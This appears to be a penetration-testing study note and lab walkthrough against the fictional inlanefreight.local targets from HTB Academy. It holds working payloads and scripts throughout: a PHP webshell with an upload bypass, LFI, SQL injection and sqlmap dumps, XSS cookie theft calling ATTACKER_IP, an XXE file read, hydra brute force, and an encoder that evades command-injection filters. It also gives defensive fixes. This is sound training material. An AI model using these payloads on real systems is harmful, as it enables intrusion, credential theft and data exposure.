Web Enumeration & Exploitation
Overview
Web applications are usually the largest attack surface in an external penetration test. Prioritise high-impact vulnerabilities (remote code execution, sensitive data exposure, authentication bypass) over low-severity findings. Use EyeWitness to screenshot and triage every discovered application, then test each service systematically rather than stopping at the first finding.
Web Application Discovery
EyeWitness Automation
# Subdomain list preparation
cat > ilfreight_subdomains << EOF
inlanefreight.local
blog.inlanefreight.local
careers.inlanefreight.local
dev.inlanefreight.local
gitlab.inlanefreight.local
ir.inlanefreight.local
status.inlanefreight.local
support.inlanefreight.local
tracking.inlanefreight.local
vpn.inlanefreight.local
monitoring.inlanefreight.local
EOF
# Automated screenshot capture
eyewitness -f ilfreight_subdomains -d ILFREIGHT_subdomain_EyeWitness

Application-by-Application Analysis
blog.inlanefreight.local - Drupal 9
# Version detection
curl -s http://blog.inlanefreight.local | grep Drupal
# Output: <meta name="Generator" content="Drupal 9 (https://www.drupal.org)" />
# Drupal 9 was the current major release at the time of testing
# Assessment result:
- No Drupalgeddon vulnerabilities (9.x not affected)
- Admin authentication unsuccessful
- User registration disabled
- Recommendation: Remove unused test site

careers.inlanefreight.local - Job Portal
# Key findings:
- User registration enabled
- File upload functionality (any file type)
- IDOR vulnerability in profile access
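Checking an IDOR one URL at a time does not scale and misses the silent failure mode where the server returns the tester's own profile for every id. The following is an added example (not HTB Academy's code) of a differential sweep against the /profile?id=N endpoint described above: it fingerprints each response and reports ids that returned 200 with content different from the tester's own profile. The PHPSESSID cookie name is an assumption, and the fake backend is constructed so the sweep runs offline.

```python
"""Differential IDOR sweep for /profile?id=N. Added example, not the page's code."""
import hashlib
from typing import Callable, Dict, List, Tuple

# A fetcher returns (status, body) for one profile id. Against a live target it wraps
# an HTTP client carrying the tester's session cookie; offline it is fake_fetch below.
Fetcher = Callable[[int], Tuple[int, str]]


def body_fingerprint(body: str) -> str:
    """Short hash so bodies can be compared without storing them."""
    return hashlib.sha256(body.encode()).hexdigest()[:16]


def sweep_idor(fetch: Fetcher, own_id: int, candidate_ids: range) -> List[Dict]:
    """Return candidate ids that served HTTP 200 with content unlike our own profile.

    Three outcomes are distinguished: a non-200 (access control held), a 200 that is
    byte-identical to our own profile (server ignored the id), and a 200 with different
    content (the IDOR hit worth reporting).
    """
    _, own_body = fetch(own_id)
    own_fp = body_fingerprint(own_body)
    hits = []
    for pid in candidate_ids:
        if pid == own_id:
            continue
        status, body = fetch(pid)
        if status != 200:
            continue
        fp = body_fingerprint(body)
        if fp == own_fp:
            continue
        hits.append({"id": pid, "fingerprint": fp, "length": len(body)})
    return hits


# Constructed stand-in for careers.inlanefreight.local; none of this is real data.
FAKE_PROFILES = {
    1: (200, "<h1>Profile</h1><p>Name: applicant-one</p><p>SSN: ***-**-0001</p>"),
    2: (200, "<h1>Profile</h1><p>Name: applicant-two</p><p>SSN: ***-**-0002</p>"),
    3: (200, "<h1>Profile</h1><p>Name: applicant-three</p><p>Applied: Logistics Analyst</p>"),
    4: (403, "Forbidden"),
    7: (200, "<h1>Profile</h1><p>Name: tester</p>"),  # the account we registered
}


def fake_fetch(pid: int) -> Tuple[int, str]:
    return FAKE_PROFILES.get(pid, (404, "Not found"))


def live_fetch(base_url: str, session_cookie: str) -> Fetcher:
    """Build a fetcher for a real target (needs the requests package; not run offline).
    Cookie name PHPSESSID is an assumption about the application."""
    import requests

    def fetch(pid: int) -> Tuple[int, str]:
        r = requests.get(f"{base_url}/profile", params={"id": pid},
                         cookies={"PHPSESSID": session_cookie},
                         allow_redirects=False, timeout=10)
        return r.status_code, r.text
    return fetch


if __name__ == "__main__":
    for hit in sweep_idor(fake_fetch, own_id=7, candidate_ids=range(1, 10)):
        print(hit)
```

Keep the fingerprints and lengths as evidence for the report; they show the responses differ without having to paste other applicants' personal data into the deliverable.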
# IDOR exploitation:
http://careers.inlanefreight.local/profile?id=1 # Access other users
http://careers.inlanefreight.local/profile?id=2 # Sensitive data exposure
http://careers.inlanefreight.local/profile?id=3 # Job application details

dev.inlanefreight.local - Key Vault
# Directory enumeration
gobuster dir -u http://dev.inlanefreight.local -w /usr/share/wordlists/dirb/common.txt -x .php -t 300
# Key discoveries:
/uploads/ # Directory listing enabled, so anything uploaded is browsable at a predictable URL
/upload.php # HTTP 403 Forbidden on a normal GET: the script exists but access is restricted, which makes it a candidate for method- and header-based bypasses
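A 403 on one method says nothing about the others. This added example (not the page's or HTB Academy's code) sends the same path with each HTTP method, once plain and once with the X-Custom-IP-Authorization: 127.0.0.1 header used below, and reports the methods whose status differs from the plain GET baseline. fake_send is a constructed stand-in for the misconfigured server; tcp_send is the equivalent over a raw socket for a live host.

```python
"""HTTP verb tampering probe. Added example, not code from the page."""
import socket
from typing import Callable, Dict, Optional, Tuple

Sender = Callable[[bytes], bytes]   # raw request bytes in, raw response bytes out

DEFAULT_METHODS = ("GET", "POST", "HEAD", "OPTIONS", "PUT", "DELETE", "TRACE", "TRACK")
BYPASS_HEADERS = {"X-Custom-IP-Authorization": "127.0.0.1"}


def build_raw_request(method: str, path: str, host: str,
                      headers: Optional[Dict[str, str]] = None) -> bytes:
    """Hand-build an HTTP/1.1 request so non-standard verbs such as TRACK can be sent."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}", "Connection: close"]
    lines += [f"{k}: {v}" for k, v in (headers or {}).items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def parse_status(raw_response: bytes) -> int:
    """Numeric status code from the first line of a raw HTTP response."""
    status_line = raw_response.split(b"\r\n", 1)[0]
    return int(status_line.split(b" ", 2)[1])


def probe_verbs(send: Sender, host: str, path: str,
                methods=DEFAULT_METHODS) -> Dict[str, Tuple[int, int]]:
    """Map each method to (status without bypass header, status with bypass header)."""
    results = {}
    for method in methods:
        plain = parse_status(send(build_raw_request(method, path, host)))
        tampered = parse_status(send(build_raw_request(method, path, host, BYPASS_HEADERS)))
        results[method] = (plain, tampered)
    return results


def anomalies(results: Dict[str, Tuple[int, int]],
              baseline_method: str = "GET") -> Dict[str, Tuple[int, int]]:
    """Entries where either status differs from the plain GET: these are the leads."""
    baseline = results[baseline_method][0]
    return {m: r for m, r in results.items() if r[0] != baseline or r[1] != baseline}


def tcp_send(host: str, port: int = 80, timeout: float = 5.0) -> Sender:
    """Live sender: one TCP connection per request, read until the server closes."""
    def send(raw: bytes) -> bytes:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(raw)
            chunks = []
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    return send


def fake_send(raw: bytes) -> bytes:
    """Constructed stand-in (not a capture of dev.inlanefreight.local): the deny rule on
    /upload.php applies to GET and POST only, and a front-end component trusts
    X-Custom-IP-Authorization as the client address."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode()
    request_line, *header_lines = head.split("\r\n")
    method = request_line.split(" ")[0]
    headers = {k.strip().lower(): v.strip()
               for k, v in (h.split(":", 1) for h in header_lines)}
    trusted = headers.get("x-custom-ip-authorization") == "127.0.0.1"
    if method in ("GET", "POST") and not trusted:
        return b"HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n"
    body = b"<form method=POST enctype=multipart/form-data><input type=file name=file></form>"
    return b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n" + body


if __name__ == "__main__":
    host, path = "dev.inlanefreight.local", "/upload.php"
    for method, (plain, tampered) in anomalies(probe_verbs(fake_send, host, path)).items():
        print(f"{method:8} plain={plain} with-header={tampered}")
    # Live: anomalies(probe_verbs(tcp_send(host), host, path))
```

On Apache this pattern usually comes from a `<Limit GET POST>` block, which restricts only the methods it names; `<LimitExcept>` or a `Require` outside any `<Limit>` closes the gap. Strip or ignore client-supplied IP headers at the edge unless they come from a trusted proxy.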
# HTTP Verb Tampering exploitation:
TRACK /upload.php HTTP/1.1
Host: dev.inlanefreight.local
X-Custom-IP-Authorization: 127.0.0.1
# Result: the response body contains the file upload form

Unrestricted File Upload Chain
# 1. Create PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# 2. Upload with Content-Type bypass (set in the multipart part header for the shell.php field)
Content-Type: image/png # Instead of application/x-php; the server trusts the declared type and keeps the .php extension
# 3. Command execution
curl "http://dev.inlanefreight.local/uploads/shell.php?cmd=id"
# Output: uid=33(www-data) gid=33(www-data)

ir.inlanefreight.local - WordPress
# WPScan enumeration (ap = all plugins, u = users; the user list below needs u)
wpscan -e ap,u -t 500 --url http://ir.inlanefreight.local
# Key findings:
- WordPress 6.0 (latest release at the time of testing)
- mail-masta plugin (Local File Inclusion via the pl parameter of inc/campaign/count_of_send.php)
- Users: ilfreightwp, tom, james, john
# LFI exploitation (Mail Masta plugin):
curl "http://ir.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
# Password brute force:
wpscan --url http://ir.inlanefreight.local -P passwords.txt -U ilfreightwp
# Result: ilfreightwp:password1
# WordPress admin access → Theme editor → PHP shell injection

status.inlanefreight.local - Log Search
# SQL injection discovery
Input: '
Error: "MySQL syntax error near '%'' at line 1"
# Manual UNION attack (the original query returns 4 columns; NULL pads the first, the rest are MySQL built-ins):
' union select null, database(), user(), @@version -- //
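To see why the lone quote produced the error above and why the UNION payload works, here is an added example (not the page's code) that rebuilds the log search in SQLite: the vulnerable concatenated query beside the parameterised one, with the UNION payload adapted to two result columns and to SQLite (database(), user() and @@version are MySQL-only). The table contents are constructed.

```python
"""Vulnerable vs parameterised log search. Added example, not the page's code."""
import sqlite3
from typing import List, Optional, Tuple

# Constructed schema and rows standing in for the status.inlanefreight.local database
SCHEMA = """
CREATE TABLE logs(id INTEGER PRIMARY KEY, level TEXT, message TEXT);
CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO logs(level, message) VALUES ('INFO', 'service started'), ('WARN', 'disk 91% full');
INSERT INTO users(username, password) VALUES ('admin', 'constructed-hash-1'),
                                            ('analyst', 'constructed-hash-2');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_logs_vulnerable(conn: sqlite3.Connection, term: str) -> List[Tuple[str, str]]:
    # Vulnerable: the term is spliced into the SQL text, so a quote ends the string literal
    # and everything after it is parsed as SQL (this is the pattern behind the syntax error)
    sql = "SELECT level, message FROM logs WHERE message LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_logs_safe(conn: sqlite3.Connection, term: str) -> List[Tuple[str, str]]:
    # Fixed: the placeholder is bound as data; the driver never re-parses the term as SQL
    sql = "SELECT level, message FROM logs WHERE message LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def probe_error(search, conn: sqlite3.Connection, term: str) -> Optional[str]:
    """Return the database error a probe input provokes, or None if the query ran cleanly."""
    try:
        search(conn, term)
    except sqlite3.Error as exc:
        return str(exc)
    return None


# Two result columns here, so two expressions in the UNION; the page's target needed four.
# The trailing comment swallows the query's own closing %' so the statement stays valid.
UNION_PAYLOAD = "' UNION SELECT username, password FROM users -- //"


if __name__ == "__main__":
    conn = make_db()
    print("error on ' :", probe_error(search_logs_vulnerable, conn, "'"))
    print("vulnerable  :", search_logs_vulnerable(conn, UNION_PAYLOAD))
    print("safe        :", search_logs_safe(conn, UNION_PAYLOAD))
```

The column count matters: a UNION with the wrong number of expressions fails with its own distinctive error, which is how the four columns in the page's payload were established before sqlmap was run.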
# SQLMap exploitation:
sqlmap -r sqli.txt --dbms=mysql --dbs
sqlmap -r sqli.txt --dbms=mysql -D status --tables
sqlmap -r sqli.txt --dbms=mysql -D status -T users --dump

support.inlanefreight.local - IT Support Portal
# XSS testing in ticket submission
Payload: "><script src=http://ATTACKER_IP:9000/TESTING_THIS></script>
# Blind XSS confirmation
nc -lvnp 9000
# Result: Connection from target with User-Agent: HTBXSS/1.0
# Cookie stealing setup:
# index.php - cookie logger
# script.js - cookie exfiltration payload
# Session hijacking result:
# Admin session cookie captured → Dashboard access

tracking.inlanefreight.local - PDF Generator
# HTML injection testing
Input: <h1>test</h1>
Result: Rendered in PDF tracking field
# Server-side XSS in the PDF renderer with SSRF-class impact: the injected JavaScript runs inside the HTML-to-PDF converter on the server, not in a user's browser, so file:// and internal URLs are reachable (used here for local file read)
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(this.responseText)};
x.open("GET","file:///etc/passwd");
x.send();
</script>
# Result: Local file contents displayed in generated PDF

vpn.inlanefreight.local - Fortinet SSL VPN
# Assessment result:
- Current version at the time of testing (no known CVEs)
- Common credentials unsuccessful
- Potential password spraying target
- Access denied error message

gitlab.inlanefreight.local - GitLab Instance
# Misconfiguration assessment:
- User registration enabled (no admin approval)
- Public project access available
- shopdev2.inlanefreight.local project discovered
# Security issues:
- No domain restrictions on registration
- Sensitive project exposure
- Development environment discovery

shopdev2.inlanefreight.local - Shopping Cart
# Authentication testing:
admin:admin # Successful login (weak credentials)
# XXE vulnerability in checkout process:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE userid [
<!ENTITY xxetest SYSTEM "file:///etc/passwd">
]>
<root>
<subtotal>undefined</subtotal>
<userid>&xxetest;</userid>
</root>
# Result: Local file read capability

monitoring.inlanefreight.local - Monitoring Console
# Authentication brute force:
hydra -l admin -P passwords.txt monitoring.inlanefreight.local http-post-form "/login.php:username=admin&password=^PASS^:Invalid Credentials!"
# Result: admin:12qwaszx
# Restricted shell analysis:
Available commands: ls, cat, whoami, date, help, clear, reboot, cd, mv, rm, rmdir, touch, connection_test
# Command injection in connection_test:
GET /ping.php?ip=127.0.0.1%0a'i'd
# Bypass: %0a is a URL-encoded newline, which ends the ping command and starts ours; the quotes split the command word so a substring blocklist never sees it whole, while the shell concatenates 'i'd back into id (the same trick defeats the whoami, echo and rm entries below)
# Filter analysis:
Blocked: &, |, ;, \, /, space, whoami, echo, rm, etc.
Bypass: ${IFS} for spaces, %0a for command separation
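The bypass notes above are a manual recipe. This added example (not the page's code) automates it: a stand-in for the console's blocklist so payloads can be checked before they are sent, an encoder that applies the newline separator, first-character quoting and ${IFS}, and a decoder that shows what the shell will actually run. The slash substitution ${PATH:0:1} is a standard bash trick added here (PATH almost always starts with /); that $, { and } pass the real filter is an assumption about the target, and the blocklist below is the page's list, not the console's source.

```python
"""Command-injection filter bypass encoder. Added example, not code from the page."""
import urllib.parse

# Stand-in for the monitoring console's filter as documented on this page; the page's
# "etc." means the real list is longer, so treat a pass here as a hypothesis to test.
BLOCKED_CHARS = set("&|;\\/ ")
BLOCKED_WORDS = ("whoami", "echo", "rm")


def is_blocked(decoded_value: str) -> bool:
    """Simulate the filter: any blocked character or blocked substring rejects the input."""
    if any(ch in BLOCKED_CHARS for ch in decoded_value):
        return True
    return any(word in decoded_value for word in BLOCKED_WORDS)


def split_word(word: str) -> str:
    """whoami -> 'w'hoami: the shell concatenates the quoted and unquoted parts back into
    one word, but the filter's substring match for 'whoami' no longer fires."""
    return f"'{word[0]}'{word[1:]}"


def encode_command(command: str) -> str:
    """Rewrite a command so it passes is_blocked() yet runs unchanged in bash."""
    parts = []
    for word in command.split():
        word = word.replace("/", "${PATH:0:1}")        # assumption: PATH begins with /
        if any(blocked in word for blocked in BLOCKED_WORDS):
            word = split_word(word)
        parts.append(word)
    return "${IFS}".join(parts)                         # ${IFS} expands to a space


def build_ip_parameter(legit_ip: str, command: str) -> str:
    """Value for ip=: the legitimate address, a newline to end ping, then our command."""
    decoded = legit_ip + "\n" + encode_command(command)
    return urllib.parse.quote(decoded, safe="'${}:.")   # newline becomes %0A


def passes_filter(encoded_param: str) -> bool:
    """Would the server-side filter (as modelled above) accept this parameter?"""
    return not is_blocked(urllib.parse.unquote(encoded_param))


def shell_view(encoded_param: str) -> str:
    """Approximate what bash executes: decode, drop quotes, expand ${IFS} and ${PATH:0:1}."""
    decoded = urllib.parse.unquote(encoded_param)
    return (decoded.replace("'", "")
                   .replace("${IFS}", " ")
                   .replace("${PATH:0:1}", "/"))


if __name__ == "__main__":
    for cmd in ("id", "whoami", "cat /etc/passwd", "rm -f /tmp/x"):
        param = build_ip_parameter("127.0.0.1", cmd)
        print(f"{cmd!r:20} -> ip={param}  filter_ok={passes_filter(param)}")
        print(" " * 24, "shell sees:", shell_view(param).splitlines()[-1])
```

The decoder is the useful check: after each tweak to the encoder, confirm the reconstructed command is exactly what you intend before sending it, since a broken quote on the target gives no error message to diagnose.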
# Network discovery:
IP addresses: 10.129.203.101 (external), 172.16.8.120 (internal)
# Pivot opportunity into internal network

Key Vulnerabilities Discovered
High Risk Findings
1. Unrestricted File Upload (dev.inlanefreight.local)
2. HTTP Verb Tampering (dev.inlanefreight.local)
3. Local File Inclusion (ir.inlanefreight.local)
4. Weak WordPress Credentials (ir.inlanefreight.local)
5. SQL Injection (status.inlanefreight.local)
6. Cross-Site Scripting (support.inlanefreight.local)
7. SSRF to Local File Read (tracking.inlanefreight.local)
8. Misconfigured GitLab Instance (gitlab.inlanefreight.local)
9. XML External Entity Injection (shopdev2.inlanefreight.local)
10. Command Injection (monitoring.inlanefreight.local)
11. Weak Authentication (multiple applications)

Medium Risk Findings
1. Directory Listing Enabled (dev.inlanefreight.local)
2. IDOR - User Profile Access (careers.inlanefreight.local)
3. Abandoned Test Applications (blog.inlanefreight.local)

Attack Chain Summary
External → Internal Pivot Path
# 1. External reconnaissance
Nmap scans → Service discovery → Subdomain enumeration
# 2. Web application testing
EyeWitness → Individual app analysis → Vulnerability discovery
# 3. Initial foothold options:
- PHP webshell via file upload (dev.inlanefreight.local)
- WordPress theme editor (ir.inlanefreight.local)
- Command injection (monitoring.inlanefreight.local)
# 4. Internal network access:
monitoring.inlanefreight.local → 172.16.8.120 interface
→ Pivot into internal AD environment

Tools & Techniques Used
Web Enumeration
# Application discovery
eyewitness -f subdomain_list -d output_dir
# Directory brute forcing
gobuster dir -u TARGET -w wordlist -x .php -t 300
# WordPress enumeration
wpscan -e ap,u -t 500 --url TARGET
# Password brute forcing
hydra -l admin -P wordlist TARGET http-post-form "PATH:PARAMS:FAIL_STRING"

Exploitation Techniques
# File upload bypass
Content-Type: image/png # MIME type manipulation
# SQL injection
sqlmap -r request.txt --dbms=mysql --dump -D database -T table
# XSS cookie stealing
<script src=http://ATTACKER/script.js></script>
# XXE local file read
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
# Command injection bypass
%0a'command' # Newline + single quotes
${IFS} # Space bypass using environment variable

HTB Academy Labs
Lab Solutions Summary
Lab 1: IDOR vulnerability → Profile enumeration → Flag discovery
Lab 2: HTTP verb tampering → File upload → Webshell execution
Lab 3: WordPress exploitation → Theme editor → Reverse shell
Lab 4: SQL injection → Database enumeration → User password extraction
Lab 5: XSS exploitation → Cookie stealing → Session hijacking
Lab 6: SSRF vulnerability → Local file read → Flag extraction
Lab 7: GitLab registration → Project access → Flag discovery
Lab 8: XXE injection → XML manipulation → File system access
Lab 9: Authentication brute force → Command injection → Flag retrieval

Key Learning Points
# Professional approach:
- Systematic application testing
- Evidence collection for each finding
- Business impact assessment
- Remediation priority guidance
# Technical skills:
- Multi-vector exploitation chains
- Filter bypass techniques
- Session management attacks
- Local file read escalation
# Real-world scenarios:
- Weak credential prevalence
- Development environment exposure
- Misconfigured public services
- Internal network pivot opportunities

Defensive Recommendations
Application Security
# Input validation:
- Implement proper input sanitization
- Use parameterized queries (SQL injection prevention)
- Validate file uploads (type, size, content)
- Escape user output (XSS prevention)
# Authentication security:
- Enforce strong password policies
- Implement account lockout mechanisms
- Use multi-factor authentication
- Regular credential audits
# Configuration hardening:
- Remove test/development applications
- Disable unnecessary HTTP methods
- Configure proper error handling
- Implement security headers
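The upload on dev.inlanefreight.local was exploitable because the server believed the client's Content-Type header. This added example (not the page's code) puts that check beside a hardened one that ignores the declared type, allowlists the extension, verifies the file's leading bytes against that extension, rejects PHP markers inside otherwise valid images, and stores the file under a server-chosen name. The signature table and sample bytes are constructed.

```python
"""File upload validation: the trusting check beside the hardened one.
Added example, not the page's code."""
import os
import secrets
from typing import Dict, Optional, Tuple

# Extension allowlist with the magic bytes each type must start with (constructed table)
SIGNATURES: Dict[str, Tuple[bytes, ...]] = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024


def accept_vulnerable(filename: str, content_type: str, data: bytes) -> Optional[str]:
    """The behaviour described on this page: trust the declared MIME type and keep the
    client's filename, so shell.php with Content-Type: image/png is stored and executable."""
    if content_type not in ("image/png", "image/jpeg", "image/gif"):
        return None
    return os.path.basename(filename)


def accept_hardened(filename: str, content_type: str, data: bytes) -> Optional[str]:
    """Decide from the extension allowlist and the bytes; content_type is ignored on purpose.
    Returns the server-side filename to store under, or None to reject."""
    if not data or len(data) > MAX_BYTES:
        return None
    base = os.path.basename(filename)
    if "." not in base:
        return None
    ext = base.rsplit(".", 1)[1].lower()         # only the final extension counts
    sigs = SIGNATURES.get(ext)
    if sigs is None:                             # .php, .phtml, .phar ... all rejected
        return None
    if not any(data.startswith(sig) for sig in sigs):
        return None                              # extension claims image, bytes disagree
    if b"<?php" in data or b"<?=" in data:
        return None                              # image/PHP polyglot guard
    return f"{secrets.token_hex(16)}.{ext}"      # client-chosen name is never reused


if __name__ == "__main__":
    shell = b'<?php system($_GET["cmd"]); ?>'
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print("vulnerable stores shell.php as:", accept_vulnerable("shell.php", "image/png", shell))
    print("hardened on shell.php:        ", accept_hardened("shell.php", "image/png", shell))
    print("hardened on real logo.png:    ", accept_hardened("logo.png", "image/png", png))
```

Pair this with storage outside the web root (or a location with script execution disabled) and with directory listing off; the random filename also removes the predictable /uploads/shell.php URL that made the page's chain a one-request exploit.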